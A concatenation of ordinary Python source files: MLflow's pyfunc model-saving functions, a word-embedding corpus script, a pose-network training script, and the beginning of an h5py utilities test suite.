**kwargs,
):
"""
save_model(path, loader_module=None, data_path=None, code_path=None, conda_env=None,\
mlflow_model=Model(), python_model=None, artifacts=None)
Save a Pyfunc model with custom inference logic and optional data dependencies to a path on the
local filesystem.
For information about the workflows that this method supports, please see :ref:`"workflows for
creating custom pyfunc models" <pyfunc-create-custom-workflows>` and
:ref:`"which workflow is right for my use case?" <pyfunc-create-custom-selecting-workflow>`.
Note that the parameters for the second workflow: ``loader_module``, ``data_path`` and the
parameters for the first workflow: ``python_model``, ``artifacts``, cannot be
specified together.
:param path: The path to which to save the Python model.
:param loader_module: The name of the Python module that is used to load the model
from ``data_path``. This module must define a method with the prototype
``_load_pyfunc(data_path)``. If not ``None``, this module and its
dependencies must be included in one of the following locations:
- The MLflow library.
- Package(s) listed in the model's Conda environment, specified by
the ``conda_env`` parameter.
- One or more of the files specified by the ``code_path`` parameter.
:param data_path: Path to a file or directory containing model data.
:param code_path: A list of local filesystem paths to Python file dependencies (or directories
containing file dependencies). These files are *prepended* to the system
path before the model is loaded.
:param conda_env: {{ conda_env }}
:param mlflow_model: :py:mod:`mlflow.models.Model` configuration to which to add the
**python_function** flavor.
:param python_model: An instance of a subclass of :class:`~PythonModel`. This class is
serialized using the CloudPickle library. Any dependencies of the class
should be included in one of the following locations:
- The MLflow library.
- Package(s) listed in the model's Conda environment, specified by
the ``conda_env`` parameter.
- One or more of the files specified by the ``code_path`` parameter.
Note: If the class is imported from another module, as opposed to being
defined in the ``__main__`` scope, the defining module should also be
included in one of the listed locations.
:param artifacts: A dictionary containing ``<name, artifact_uri>`` entries. Remote artifact URIs
are resolved to absolute filesystem paths, producing a dictionary of
``<name, absolute_path>`` entries. ``python_model`` can reference these
resolved entries as the ``artifacts`` property of the ``context`` parameter
in :func:`PythonModel.load_context() <mlflow.pyfunc.PythonModel.load_context>`
and :func:`PythonModel.predict() <mlflow.pyfunc.PythonModel.predict>`.
For example, consider the following ``artifacts`` dictionary::
{
"my_file": "s3://my-bucket/path/to/my/file"
}
In this case, the ``"my_file"`` artifact is downloaded from S3. The
``python_model`` can then refer to ``"my_file"`` as an absolute filesystem
path via ``context.artifacts["my_file"]``.
If ``None``, no artifacts are added to the model.
:param signature: :py:class:`ModelSignature <mlflow.models.ModelSignature>`
describes model input and output :py:class:`Schema <mlflow.types.Schema>`.
The model signature can be :py:func:`inferred <mlflow.models.infer_signature>`
from datasets with valid model input (e.g. the training dataset with target
column omitted) and valid model output (e.g. model predictions generated on
the training dataset), for example:
.. code-block:: python
from mlflow.models.signature import infer_signature
train = df.drop_column("target_label")
predictions = ... # compute model predictions
signature = infer_signature(train, predictions)
:param input_example: Input example provides one or several instances of valid
model input. The example can be used as a hint of what data to feed the
model. The given example can be a Pandas DataFrame where the given
example will be serialized to json using the Pandas split-oriented
format, or a numpy array where the example will be serialized to json
by converting it to a list. Bytes are base64-encoded.
:param pip_requirements: {{ pip_requirements }}
:param extra_pip_requirements: {{ extra_pip_requirements }}
"""
_validate_env_arguments(conda_env, pip_requirements, extra_pip_requirements)
mlflow_model = kwargs.pop("model", mlflow_model)
if len(kwargs) > 0:
raise TypeError("save_model() got unexpected keyword arguments: {}".format(kwargs))
if code_path is not None:
if not isinstance(code_path, list):
raise TypeError("Argument code_path should be a list, not {}".format(type(code_path)))
first_argument_set = {
"loader_module": loader_module,
"data_path": data_path,
}
second_argument_set = {
"artifacts": artifacts,
"python_model": python_model,
}
first_argument_set_specified = any(item is not None for item in first_argument_set.values())
second_argument_set_specified = any(item is not None for item in second_argument_set.values())
if first_argument_set_specified and second_argument_set_specified:
raise MlflowException(
message=(
"The following sets of parameters cannot be specified together: {first_set_keys}"
" and {second_set_keys}. All parameters in one set must be `None`. Instead, found"
" the following values: {first_set_entries} and {second_set_entries}".format(
first_set_keys=first_argument_set.keys(),
second_set_keys=second_argument_set.keys(),
first_set_entries=first_argument_set,
second_set_entries=second_argument_set,
)
),
error_code=INVALID_PARAMETER_VALUE,
)
elif (loader_module is None) and (python_model is None):
msg = (
"Either `loader_module` or `python_model` must be specified. A `loader_module` "
"should be a python module. A `python_model` should be a subclass of PythonModel"
)
raise MlflowException(message=msg, error_code=INVALID_PARAMETER_VALUE)
_validate_and_prepare_target_save_path(path)
if mlflow_model is None:
mlflow_model = Model()
if signature is not None:
mlflow_model.signature = signature
if input_example is not None:
_save_example(mlflow_model, input_example, path)
if first_argument_set_specified:
return _save_model_with_loader_module_and_data_path(
path=path,
loader_module=loader_module,
data_path=data_path,
code_paths=code_path,
conda_env=conda_env,
mlflow_model=mlflow_model,
pip_requirements=pip_requirements,
extra_pip_requirements=extra_pip_requirements,
)
elif second_argument_set_specified:
return mlflow.pyfunc.model._save_model_with_class_artifacts_params(
path=path,
python_model=python_model,
artifacts=artifacts,
conda_env=conda_env,
code_paths=code_path,
mlflow_model=mlflow_model,
pip_requirements=pip_requirements,
extra_pip_requirements=extra_pip_requirements,
)
@format_docstring(LOG_MODEL_PARAM_DOCS.format(package_name="scikit-learn"))
def log_model(
artifact_path,
loader_module=None,
data_path=None,
code_path=None,
conda_env=None,
python_model=None,
artifacts=None,
registered_model_name=None,
signature: ModelSignature = None,
input_example: ModelInputExample = None,
await_registration_for=DEFAULT_AWAIT_MAX_SLEEP_SECONDS,
pip_requirements=None,
extra_pip_requirements=None,
):
"""
Log a Pyfunc model with custom inference logic and optional data dependencies as an MLflow
artifact for the current run.
For information about the workflows that this method supports, see :ref:`Workflows for
creating custom pyfunc models <pyfunc-create-custom-workflows>` and
:ref:`Which workflow is right for my use case? <pyfunc-create-custom-selecting-workflow>`.
You cannot specify the parameters for the second workflow: ``loader_module``, ``data_path``
and the parameters for the first workflow: ``python_model``, ``artifacts`` together.
:param artifact_path: The run-relative artifact path to which to log the Python model.
:param loader_module: The name of the Python module that is used to load the model
from ``data_path``. This module must define a method with the prototype
``_load_pyfunc(data_path)``. If not ``None``, this module and its
dependencies must be included in one of the following locations:
- The MLflow library.
- Package(s) listed in the model's Conda environment, specified by
the ``conda_env`` parameter.
- One or more of the files specified by the ``code_path`` parameter.
:param data_path: Path to a file or directory containing model data.
:param code_path: A list of local filesystem paths to Python file dependencies (or directories
containing file dependencies). These files are *prepended* to the system
path before the model is loaded.
:param conda_env: {{ conda_env }}
:param python_model: An instance of a subclass of :class:`~PythonModel`. This class is
serialized using the CloudPickle library. Any dependencies of the class
should be included in one of the following locations:
- The MLflow library.
- Package(s) listed in the model's Conda environment, specified by
the ``conda_env`` parameter.
- One or more of the files specified by the ``code_path`` parameter.
Note: If the class is imported from another module, as opposed to being
defined in the ``__main__`` scope, the defining module should also be
included in one of the listed locations.
:param artifacts: A dictionary containing ``<name, artifact_uri>`` entries. Remote artifact URIs
are resolved to absolute filesystem paths, producing a dictionary of
``<name, absolute_path>`` entries. ``python_model`` can reference these
resolved entries as the ``artifacts`` property of the ``context`` parameter
in :func:`PythonModel.load_context() <mlflow.pyfunc.PythonModel.load_context>`
and :func:`PythonModel.predict() <mlflow.pyfunc.PythonModel.predict>`.
For example, consider the following ``artifacts`` dictionary::
{
"my_file": "s3://my-bucket/path/to/my/file"
}
In this case, the ``"my_file"`` artifact is downloaded from S3. The
``python_model`` can then refer to ``"my_file"`` as an absolute filesystem
path via ``context.artifacts["my_file"]``.
If ``None``, no artifacts are added to the model.
:param registered_model_name: This argument may change or be removed in a
future release without warning. If given, create a model
version under ``registered_model_name``, also creating a
registered model if one with the given name does not exist.
:param signature: :py:class:`ModelSignature <mlflow.models.ModelSignature>`
describes model input and output :py:class:`Schema <mlflow.types.Schema>`.
The model signature can be :py:func:`inferred <mlflow.models.infer_signature>`
from datasets with valid model input (e.g. the training dataset with target
column omitted) and valid model output (e.g. model predictions generated on
the training dataset), for example:
.. code-block:: python
from mlflow.models.signature import infer_signature
train = df.drop_column("target_label")
predictions = ... # compute model predictions
signature = infer_signature(train, predictions)
:param input_example: Input example provides one or several instances of valid
model input. The example can be used as a hint of what data to feed the
model. The given example can be a Pandas DataFrame where the given
example will be serialized to json using the Pandas split-oriented
format, or a numpy array where the example will be serialized to json
by converting it to a list. Bytes are base64-encoded.
:param await_registration_for: Number of seconds to wait for the model version to finish
being created and is in ``READY`` status. By default, the function
waits for five minutes. Specify 0 or None to skip waiting.
:param pip_requirements: {{ pip_requirements }}
:param extra_pip_requirements: {{ extra_pip_requirements }}
:return: A :py:class:`ModelInfo <mlflow.models.model.ModelInfo>` instance that contains the
metadata of the logged model.
"""
return Model.log(
artifact_path=artifact_path,
flavor=mlflow.pyfunc,
loader_module=loader_module,
data_path=data_path,
code_path=code_path,
python_model=python_model,
artifacts=artifacts,
conda_env=conda_env,
registered_model_name=registered_model_name,
signature=signature,
input_example=input_example,
await_registration_for=await_registration_for,
pip_requirements=pip_requirements,
extra_pip_requirements=extra_pip_requirements,
)
def _save_model_with_loader_module_and_data_path(
path,
loader_module,
data_path=None,
code_paths=None,
conda_env=None,
mlflow_model=None,
pip_requirements=None,
extra_pip_requirements=None,
):
"""
Export model as a generic Python function model.
:param path: The path to which to save the Python model.
:param loader_module: The name of the Python module that is used to load the model
from ``data_path``. This module must define a method with the prototype
``_load_pyfunc(data_path)``.
:param data_path: Path to a file or directory containing model data.
:param code_paths: A list of local filesystem paths to Python file dependencies (or directories
containing file dependencies). These files are *prepended* to the system
path before the model is loaded.
:param conda_env: Either a dictionary representation of a Conda environment or the path to a
Conda environment yaml file. If provided, this decsribes the environment
this model should be run in.
:return: Model configuration containing model info.
"""
data = None
if data_path is not None:
model_file = _copy_file_or_tree(src=data_path, dst=path, dst_dir="data")
data = model_file
code_dir_subpath = _validate_and_copy_code_paths(code_paths, path)
if mlflow_model is None:
mlflow_model = Model()
mlflow.pyfunc.add_to_model(
mlflow_model,
loader_module=loader_module,
code=code_dir_subpath,
data=data,
env=_CONDA_ENV_FILE_NAME,
)
mlflow_model.save(os.path.join(path, MLMODEL_FILE_NAME))
if conda_env is None:
if pip_requirements is None:
default_reqs = get_default_pip_requirements()
# To ensure `_load_pyfunc` can successfully load the model during the dependency
# inference, `mlflow_model.save` must be called beforehand to save an MLmodel file.
inferred_reqs = mlflow.models.infer_pip_requirements(
path,
FLAVOR_NAME,
fallback=default_reqs,
)
default_reqs = sorted(set(inferred_reqs).union(default_reqs))
else:
default_reqs = None
conda_env, pip_requirements, pip_constraints = _process_pip_requirements(
default_reqs,
pip_requirements,
extra_pip_requirements,
)
else:
conda_env, pip_requirements, pip_constraints = _process_conda_env(conda_env)
with open(os.path.join(path, _CONDA_ENV_FILE_NAME), "w") as f:
yaml.safe_dump(conda_env, stream=f, default_flow_style=False)
# Save `constraints.txt` if necessary
if pip_constraints:
write_to(os.path.join(path, _CONSTRAINTS_FILE_NAME), "\n".join(pip_constraints))
# Save `requirements.txt`
write_to(os.path.join(path, _REQUIREMENTS_FILE_NAME), "\n".join(pip_requirements))
return mlflow_model
loader_template = """
import importlib
import os
import sys
def load_pyfunc():
{update_path}return importlib.import_module('{main}')._load_pyfunc('{data_path}')
"""
|
makecorpus.py | import argparse
import os
import numpy as np
from multiprocessing import Process, Queue
from Queue import Empty
import ioutils
from representations.explicit import Explicit
from statutils.fastfreqdist import CachedFreqDist
SAMPLE_MAX = 1e9
def worker(proc_num, queue, out_dir, in_dir, count_dir, valid_words, num_words, min_count, sample=1e-5):
while True:
try:
year = queue.get(block=False)
except Empty:
break
print proc_num, "Getting counts and matrix year", year
embed = Explicit.load(in_dir + str(year) + ".bin", normalize=False)
year_words = valid_words[year][:num_words]
count_words = set(ioutils.words_above_count(count_dir, year, min_count))
freq = CachedFreqDist(ioutils.load_pickle(count_dir + str(year) + "-counts.pkl"))
use_words = list(count_words.intersection(year_words))
embed = embed.get_subembed(use_words, restrict_context=True)
sample_corr = min(SAMPLE_MAX / freq.N(), 1.0)
print "Sample correction..", sample_corr
embed.m = embed.m * sample_corr
mat = embed.m.tocoo()
print proc_num, "Outputing pairs for year", year
with open(out_dir + str(year) + ".tmp.txt", "w") as fp:
for i in xrange(len(mat.data)):
if i % 10000 == 0:
print "Done ", i, "of", len(mat.data)
word = embed.iw[mat.row[i]]
context = embed.ic[mat.col[i]]
if sample != 0:
prop_keep = min(np.sqrt(sample / freq.freq(word)), 1.0)
prop_keep *= min(np.sqrt(sample / freq.freq(context)), 1.0)
else:
prop_keep = 1.0
word = word.encode("utf-8")
context = context.encode("utf-8")
line = word + " " + context + "\n"
for j in xrange(int(mat.data[i] * prop_keep)):
fp.write(line)
mat = mat.tocsr()
print proc_num, "Outputing vocab for year", year
with open(out_dir + str(year) + ".vocab", "w") as fp:
for word in year_words:
if not word in count_words:
print >>fp, word.encode("utf-8"), 1
else:
if word in embed.wi:
print >>fp, word.encode("utf-8"), int(mat[embed.wi[word], :].sum())
print "shuf " + out_dir + str(year) + ".tmp.txt" " > " + out_dir + str(year) + ".txt"
os.system("shuf " + out_dir + str(year) + ".tmp.txt" + " > " + out_dir + str(year) + ".txt")
os.remove(out_dir + str(year) + ".tmp.txt")
def run_parallel(num_procs, out_dir, in_dir, count_dir, years, words, num_words, min_count, sample):
queue = Queue()
for year in years:
queue.put(year)
procs = [Process(target=worker, args=[i, queue, out_dir, in_dir, count_dir, words, num_words, min_count, sample]) for i in range(num_procs)]
for p in procs:
p.start()
for p in procs:
p.join()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Computes various frequency statistics.")
parser.add_argument("out_dir")
parser.add_argument("in_dir")
parser.add_argument("count_dir")
parser.add_argument("word_file", help="file maps from year to word list (the output of freqperyear)")
parser.add_argument("--workers", type=int, default=10)
parser.add_argument("--num-words", type=int, default=None)
parser.add_argument("--start-year", type=int, help="start year (inclusive)", default=1800)
parser.add_argument("--end-year", type=int, help="end year (inclusive)", default=2000)
parser.add_argument("--year-inc", type=int, help="end year (inclusive)", default=1)
parser.add_argument("--min-count", type=int, default=100)
parser.add_argument("--sample", type=float, default=1e-5)
args = parser.parse_args()
years = range(args.start_year, args.end_year + 1, args.year_inc)
words = ioutils.load_year_words(args.word_file, years)
ioutils.mkdir(args.out_dir)
run_parallel(args.workers, args.out_dir + "/", args.in_dir + "/", args.count_dir + "/", years, words, args.num_words, args.min_count, args.sample)
|
train_pose_only.py | import matplotlib
matplotlib.use('Agg')
import os
from os.path import join
import argparse
import torch
import numpy as np
import pickle
import sys
import datetime
sys.path.append('./utils')
from torch import optim
from torch import nn
from torch import multiprocessing
from torch.optim import lr_scheduler
from torch.autograd import Variable
from torch.utils.data import DataLoader, ConcatDataset
from utils.builders import SingleViewPoseBuilder
from utils.builder_utils import distance, Logger, ensure_folder, collate_fn, time_stamped
from utils.vocabulary import Vocabulary
from pose_tcn import define_model
from ipdb import set_trace
from sklearn.preprocessing import OneHotEncoder
from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence
from torchvision import transforms
import torchvision.utils as vutils
import torchvision.models as models
from torchvision import datasets
from tensorboardX import SummaryWriter
import matplotlib.pyplot as plt
from utils.plot_utils import plot_mean
sys.path.append('/home/max/projects/gps-lfd')
sys.path.append('/home/msieb/projects/gps-lfd')
from config import Config_Isaac_Server as Config # Import approriate config
conf = Config()
IMAGE_SIZE = (299, 299)
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"]= "0, 1,2,3"
ITERATE_OVER_TRIPLETS = 3
EXP_NAME = conf.EXP_NAME
#EXP_DIR = os.path.join('/home/msieb/data/tcn_data/experiments', EXP_NAME)
#EXP_DIR = os.path.join('/home/msieb/projects/data/tcn_data/experiments', EXP_NAME)
EXP_DIR = conf.EXP_DIR
MODEL_FOLDER = conf.MODEL_FOLDER
USE_CUDA = conf.USE_CUDA
NUM_VIEWS = conf.NUM_VIEWS
SAMPLE_SIZE = 100
builder = SingleViewPoseBuilder
logdir = os.path.join('runs', MODEL_FOLDER, time_stamped())
print("logging to {}".format(logdir))
writer = SummaryWriter(logdir)
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('--start-epoch', type=int, default=0)
parser.add_argument('--epochs', type=int, default=1000)
parser.add_argument('--save-every', type=int, default=5)
parser.add_argument('--model-folder', type=str, default=join(EXP_DIR, EXP_NAME,'trained_models', MODEL_FOLDER, time_stamped()))
parser.add_argument('--load-model', type=str, required=False)
# parser.add_argument('--train-directory', type=str, default='./data/multiview-pouring/train/')
# parser.add_argument('--validation-directory', type=str, default='./data/multiview-pouring/val/')
parser.add_argument('--train-directory', type=str, default=join(EXP_DIR, EXP_NAME, 'videos/train/'))
parser.add_argument('--validation-directory', type=str, default=join(EXP_DIR, EXP_NAME, 'videos/valid/'))
parser.add_argument('--minibatch-size', type=int, default=16)
parser.add_argument('--margin', type=float, default=2.0)
parser.add_argument('--model-name', type=str, default='tcn')
parser.add_argument('--log-file', type=str, default='./out.log')
parser.add_argument('--lr-start', type=float, default=0.01)
parser.add_argument('--triplets-from-videos', type=int, default=5)
parser.add_argument('--n-views', type=int, default=NUM_VIEWS)
parser.add_argument('--alpha', type=float, default=0.001, help='weighing factor of language loss to triplet loss')
# parser.add_argument('--model_path', type=str, default='models/' , help='path for saving trained models')
# parser.add_argument('--crop_size', type=int, default=224 , help='size for randomly cropping images')
# parser.add_argument('--vocab_path', type=str, default='data/vocab.pkl', help='path for vocabulary wrapper')
# parser.add_argument('--image_dir', type=str, default='data/resized2014', help='directory for resized images')
# parser.add_argument('--caption_path', type=str, default='data/annotations/captions_train2014.json', help='path for train annotation json file')
# parser.add_argument('--log_step', type=int , default=10, help='step size for prining log info')
# parser.add_argument('--save_step', type=int , default=1000, help='step size for saving trained models')
# Model parameters
parser.add_argument('--embed_size', type=int , default=32, help='dimension of word embedding vectors')
parser.add_argument('--hidden_size', type=int , default=256, help='dimension of lstm hidden states')
parser.add_argument('--num_layers', type=int , default=1, help='number of layers in lstm')
# parser.add_argument('--num_epochs', type=int, default=5)
# parser.add_argument('--batch_size', type=int, default=128)
# parser.add_argument('--num_workers', type=int, default=2)
# parser.add_argument('--learning_rate', type=float, default=0.001)
return parser.parse_args()
args = get_args()
print(args)
logger = Logger(args.log_file)
def batch_size(epoch, max_size):
exponent = epoch // 100
return min(max(2 ** (exponent), 2), max_size)
validation_builder = builder(args.n_views, args.validation_directory, IMAGE_SIZE, args, sample_size=int(SAMPLE_SIZE/2.0))
validation_set = [validation_builder.build_set() for i in range(5)]
validation_set = ConcatDataset(validation_set)
del validation_builder
def loss_fn(tcn, minibatch):
if USE_CUDA:
anchor_frames = minibatch[0].cuda()
anchor_poses = minibatch[1].cuda()
anchor_output, unnormalized, anchor_pose_pred = tcn(anchor_frames)
print(anchor_pose_predprint(anchor_pose_pred))
loss = torch.nn.MSELoss()(anchor_pose_pred, anchor_poses)
return loss
def validate(tcn, use_cuda, n_calls):
# Run model on validation data and log results
data_loader = DataLoader(
validation_set,
batch_size=16,
shuffle=False,
pin_memory=use_cuda,
)
losses = []
for minibatch in data_loader:
# frames = Variable(minibatch, require_grad=False)
loss = loss_fn(tcn, minibatch)
losses.append(loss.data.cpu().numpy())
writer.add_scalar('data/valid_loss', np.mean(losses), n_calls)
n_calls += 1
loss = np.mean(losses)
logger.info('val loss: ',loss)
return loss, n_calls
def model_filename(model_name, epoch):
return "{model_name}-epoch-{epoch}.pk".format(model_name=model_name, epoch=epoch)
def save_model(model, filename, model_folder):
ensure_folder(model_folder)
model_path = os.path.join(model_folder, filename)
torch.save(model.state_dict(), model_path)
def build_set(queue, triplet_builder, log):
while 1:
datasets = []
for i in range(15):
dataset = triplet_builder.build_set()
datasets.append(dataset)
dataset = ConcatDataset(datasets)
# log.info('Created {0} triplets'.format(len(dataset)))
queue.put(dataset)
def create_model(use_cuda):
tcn = define_model(use_cuda)
# tcn = PosNet()
if args.load_model:
model_path = os.path.join(
args.model_folder,
args.load_model
)
# map_location allows us to load models trained on cuda to cpu.
tcn.load_state_dict(torch.load(model_path, map_location=lambda storage, loc: storage))
if use_cuda:
tcn = tcn.cuda()
return tcn
def main():
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
use_cuda = torch.cuda.is_available()
tcn = create_model(use_cuda)
tcn = torch.nn.DataParallel(tcn, device_ids=range(torch.cuda.device_count()))
triplet_builder = builder(args.n_views, \
args.train_directory, IMAGE_SIZE, args, sample_size=SAMPLE_SIZE)
queue = multiprocessing.Queue(1)
dataset_builder_process = multiprocessing.Process(target=build_set, args=(queue, triplet_builder, logger), daemon=True)
dataset_builder_process.start()
optimizer = optim.SGD(tcn.parameters(), lr=args.lr_start, momentum=0.9)
# This will diminish the learning rate at the milestones.
# 0.1, 0.01, 0.001
learning_rate_scheduler = lr_scheduler.MultiStepLR(optimizer, milestones=[200,500, 1000], gamma=0.1)
criterion = nn.CrossEntropyLoss()
trn_losses_ = []
val_losses_= []
n_iter = 0
n_valid_iter = 0
for epoch in range(args.start_epoch, args.start_epoch + args.epochs):
print("=" * 20)
logger.info("Starting epoch: {0} learning rate: {1}".format(epoch,
learning_rate_scheduler.get_lr()))
learning_rate_scheduler.step()
dataset = queue.get()
data_loader = DataLoader(
dataset=dataset,
batch_size=args.minibatch_size, # batch_size(epoch, args.max_minibatch_size),
shuffle=True,
pin_memory=use_cuda,
)
for _ in range(0, ITERATE_OVER_TRIPLETS):
losses = []
for minibatch in data_loader:
# frames = Variable(minibatch, require_grad=False)
loss = loss_fn(tcn, minibatch)
losses.append(loss.data.cpu().numpy())
optimizer.zero_grad()
loss.backward()
optimizer.step()
writer.add_scalar('data/train_loss', np.mean(losses), n_iter)
n_iter += 1
trn_losses_.append(np.mean(losses))
logger.info('train loss: ', np.mean(losses))
if epoch % 1 == 0:
loss, n_valid_iter = validate(tcn, use_cuda, n_valid_iter)
val_losses_.append(loss)
if epoch % args.save_every == 0 and epoch != 0:
logger.info('Saving model.')
save_model(tcn, model_filename(args.model_name, epoch), args.model_folder)
plot_mean(trn_losses_, args.model_folder, 'train_loss')
plot_mean(val_losses_, args.model_folder, 'validation_loss')
# plot_mean(train_acc_, args.model_folder, 'train_acc')
if __name__ == '__main__':
main()
|
test_h5py_utils.py | # coding: utf-8
# /*##########################################################################
# Copyright (C) 2016-2017 European Synchrotron Radiation Facility
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# ############################################################################*/
"""Tests for h5py utilities"""
__authors__ = ["W. de Nolf"]
__license__ = "MIT"
__date__ = "27/01/2020"
import unittest
import os
import sys
import time
import shutil
import tempfile
import threading
import multiprocessing
from contextlib import contextmanager
from .. import h5py_utils
from ...utils.retry import RetryError, RetryTimeoutError
IS_WINDOWS = sys.platform == "win32"
def _subprocess_context_main(queue, contextmgr, *args, **kw):
try:
with contextmgr(*args, **kw):
queue.put(None)
threading.Event().wait()
except Exception:
queue.put(None)
raise
@contextmanager
def _subprocess_context(contextmgr, *args, **kw):
timeout = kw.pop("timeout", 10)
queue = multiprocessing.Queue(maxsize=1)
p = multiprocessing.Process(
target=_subprocess_context_main, args=(queue, contextmgr) + args, kwargs=kw
)
p.start()
try:
queue.get(timeout=timeout)
yield
finally:
try:
p.kill()
except AttributeError:
p.terminate()
p.join(timeout)
@contextmanager
def _open_context(filename, **kw):
with h5py_utils.File(filename, **kw) as f:
if kw.get("mode") == "w":
f["check"] = True
f.flush()
yield f
def _cause_segfault():
import ctypes
i = ctypes.c_char(b"a")
j = ctypes.pointer(i)
c = 0
while True:
j[c] = b"a"
c += 1
def _top_level_names_test(txtfilename, *args, **kw):
sys.stderr = open(os.devnull, "w")
with open(txtfilename, mode="r") as f:
failcounter = int(f.readline().strip())
ncausefailure = kw.pop("ncausefailure")
faildelay = kw.pop("faildelay")
if failcounter < ncausefailure:
time.sleep(faildelay)
failcounter += 1
with open(txtfilename, mode="w") as f:
f.write(str(failcounter))
if failcounter % 2:
raise RetryError
else:
_cause_segfault()
return h5py_utils._top_level_names(*args, **kw)
top_level_names_test = h5py_utils.retry_in_subprocess()(_top_level_names_test)
def subtests(test):
def wrapper(self):
for _ in self._subtests():
with self.subTest(**self._subtest_options):
test(self)
return wrapper
class TestH5pyUtils(unittest.TestCase):
def setUp(self):
self.test_dir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.test_dir)
def _subtests(self):
self._subtest_options = {"mode": "w"}
self.filename_generator = self._filenames()
yield
self._subtest_options = {"mode": "w", "libver": "latest"}
self.filename_generator = self._filenames()
yield
@property
def _liber_allows_concurrent_access(self):
return self._subtest_options.get("libver") in [None, "earliest", "v18"]
def _filenames(self):
i = 1
while True:
filename = os.path.join(self.test_dir, "file{}.h5".format(i))
with self._open_context(filename):
pass
yield filename
i += 1
def _new_filename(self):
return next(self.filename_generator)
@contextmanager
def _open_context(self, filename, **kwargs):
kw = self._subtest_options
kw.update(kwargs)
with _open_context(filename, **kw) as f:
yield f
@contextmanager
def _open_context_subprocess(self, filename, **kwargs):
kw = self._subtest_options
kw.update(kwargs)
with _subprocess_context(_open_context, filename, **kw):
yield
def _assert_hdf5_data(self, f):
self.assertTrue(f["check"][()])
def _validate_hdf5_data(self, filename, swmr=False):
with self._open_context(filename, mode="r") as f:
self.assertEqual(f.swmr_mode, swmr)
self._assert_hdf5_data(f)
@subtests
def test_modes_single_process(self):
orig = os.environ.get("HDF5_USE_FILE_LOCKING")
filename1 = self._new_filename()
self.assertEqual(orig, os.environ.get("HDF5_USE_FILE_LOCKING"))
filename2 = self._new_filename()
self.assertEqual(orig, os.environ.get("HDF5_USE_FILE_LOCKING"))
with self._open_context(filename1, mode="r"):
with self._open_context(filename2, mode="r"):
pass
for mode in ["w", "a"]:
with self.assertRaises(RuntimeError):
with self._open_context(filename2, mode=mode):
pass
self.assertEqual(orig, os.environ.get("HDF5_USE_FILE_LOCKING"))
with self._open_context(filename1, mode="a"):
for mode in ["w", "a"]:
with self._open_context(filename2, mode=mode):
pass
with self.assertRaises(RuntimeError):
with self._open_context(filename2, mode="r"):
pass
self.assertEqual(orig, os.environ.get("HDF5_USE_FILE_LOCKING"))
@subtests
def test_modes_multi_process(self):
if not self._liber_allows_concurrent_access:
# A concurrent reader with HDF5_USE_FILE_LOCKING=FALSE is
# no longer works with HDF5 >=1.10 (you get an exception
# when trying to open the file)
return
filename = self._new_filename()
# File open by truncating writer
with self._open_context_subprocess(filename, mode="w"):
with self._open_context(filename, mode="r") as f:
self._assert_hdf5_data(f)
if IS_WINDOWS:
with self._open_context(filename, mode="a") as f:
self._assert_hdf5_data(f)
else:
with self.assertRaises(OSError):
with self._open_context(filename, mode="a") as f:
pass
self._validate_hdf5_data(filename)
# File open by appending writer
with self._open_context_subprocess(filename, mode="a"):
with self._open_context(filename, mode="r") as f:
self._assert_hdf5_data(f)
if IS_WINDOWS:
with self._open_context(filename, mode="a") as f:
self._assert_hdf5_data(f)
else:
with self.assertRaises(OSError):
with self._open_context(filename, mode="a") as f:
pass
self._validate_hdf5_data(filename)
# File open by reader
with self._open_context_subprocess(filename, mode="r"):
with self._open_context(filename, mode="r") as f:
self._assert_hdf5_data(f)
with self._open_context(filename, mode="a") as f:
pass
self._validate_hdf5_data(filename)
# File open by locking reader
with _subprocess_context(
_open_context, filename, mode="r", enable_file_locking=True
):
with self._open_context(filename, mode="r") as f:
self._assert_hdf5_data(f)
if IS_WINDOWS:
with self._open_context(filename, mode="a") as f:
self._assert_hdf5_data(f)
else:
with self.assertRaises(OSError):
with self._open_context(filename, mode="a") as f:
pass
self._validate_hdf5_data(filename)
@subtests
@unittest.skipIf(not h5py_utils.HAS_SWMR, "SWMR not supported")
def test_modes_multi_process_swmr(self):
filename = self._new_filename()
with self._open_context(filename, mode="w", libver="latest") as f:
pass
# File open by SWMR writer
with self._open_context_subprocess(filename, mode="a", swmr=True):
with self._open_context(filename, mode="r") as f:
assert f.swmr_mode
self._assert_hdf5_data(f)
with self.assertRaises(OSError):
with self._open_context(filename, mode="a") as f:
pass
self._validate_hdf5_data(filename, swmr=True)
@subtests
def test_retry_defaults(self):
filename = self._new_filename()
names = h5py_utils.top_level_names(filename)
self.assertEqual(names, [])
names = h5py_utils.safe_top_level_names(filename)
self.assertEqual(names, [])
names = h5py_utils.top_level_names(filename, include_only=None)
self.assertEqual(names, ["check"])
names = h5py_utils.safe_top_level_names(filename, include_only=None)
self.assertEqual(names, ["check"])
with h5py_utils.open_item(filename, "/check", validate=lambda x: False) as item:
self.assertEqual(item, None)
with h5py_utils.open_item(filename, "/check", validate=None) as item:
self.assertTrue(item[()])
with self.assertRaises(RetryTimeoutError):
with h5py_utils.open_item(
filename,
"/check",
retry_timeout=0.1,
retry_invalid=True,
validate=lambda x: False,
) as item:
pass
ncall = 0
def validate(item):
nonlocal ncall
if ncall >= 1:
return True
else:
ncall += 1
raise RetryError
with h5py_utils.open_item(
filename, "/check", validate=validate, retry_timeout=1, retry_invalid=True
) as item:
self.assertTrue(item[()])
@subtests
